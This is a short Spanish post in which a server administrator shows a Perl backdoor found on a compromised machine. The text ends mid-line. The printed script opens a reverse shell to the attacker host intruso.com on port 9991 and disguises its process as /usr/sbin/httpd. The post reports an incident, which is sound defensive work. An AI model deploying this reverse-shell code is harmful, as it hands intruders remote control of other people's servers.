He encontrado un regalito mientras limpiaba uno de mis servidores …. Este script Perl (lo he limpiado y descifrado un poco para que se entienda mejor) se conecta contra intruso.com (logicamente otra máquina), al puerto 9991. Allí, con netcat a la escucha en ese puerto, recibe la shell inversa del servidor pirateado. En mi servidor, el proceso aparece como /usr/sbin/httpd. Angelitos…
#!/usr/bin/perl
use Socket;
#
$spread="intruso.com";
$port="9991";
$fake="/usr/sbin/httpd";
if ($ARGV[0]) {
$spread=$ARGV[0];
}
$proto = getprotobyname('tcp') || die("[x] Error: getprotobyname()nn");
socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("[x] Error: Socket()n");
if (!connect(SERVER, pack "SnA4x8", 2, $port, inet_aton($spread))) {
die("[x] Failed!..n");
}
if (!fork( )) {
$0=$fake."